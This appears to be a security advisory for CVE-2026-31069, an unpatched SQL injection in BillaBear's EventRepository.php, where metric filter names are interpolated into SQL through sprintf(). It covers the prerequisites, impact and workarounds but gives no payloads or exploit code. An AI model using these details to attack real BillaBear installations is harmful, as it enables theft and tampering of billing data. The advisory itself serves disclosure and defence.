CVE-2026-31069

Vulnerability

BillaBear versions prior to January 2026 (including 2025.01.01, 2025.01.02, and 2025.01.03) are vulnerable to SQL injection in the EventRepository.php file [2][3]. The createCountSql() method uses sprintf() to directly interpolate user-controlled metric filter names and aggregation properties into SQL queries without sanitization or identifier quoting. Only filter values are parameterized; the filter names (column identifiers) are concatenated directly [2][3]. An attacker must have an authenticated session with ROLE_ACCOUNT_MANAGER privileges to exploit this [2][3].

Exploitation

An authenticated attacker with ROLE_ACCOUNT_MANAGER can craft malicious metric filter names containing SQL injection payloads [2]. When usage calculations are executed, the filter names are embedded in the SQL query via sprintf() in the WHERE clause, allowing arbitrary SQL execution [2][3]. The attack is remotely exploitable via the metric configuration interface without additional user interaction [2].

Impact

Successful exploitation allows the attacker to execute arbitrary SQL commands against the PostgreSQL database [2]. This can lead to full database compromise, including reading, modifying, or deleting sensitive subscription and billing data (e.g., customer records, invoices). The privilege level required (ROLE_ACCOUNT_MANAGER) suggests the attacker already has significant access, but the SQL injection can escalate to database-wide control.

Mitigation

The vendor (BillaBear Ltd) has not released a patch as of the publication date [2][3]. No fixed version is announced. As a workaround, administrators should restrict ROLE_ACCOUNT_MANAGER privileges to trusted users and consider applying Web Application Firewall (WAF) rules to detect SQLi patterns in metric filter names. The product's hosted version at billabear.com is managed and may receive updates separately [1]. Monitor the GitHub repository for a security release.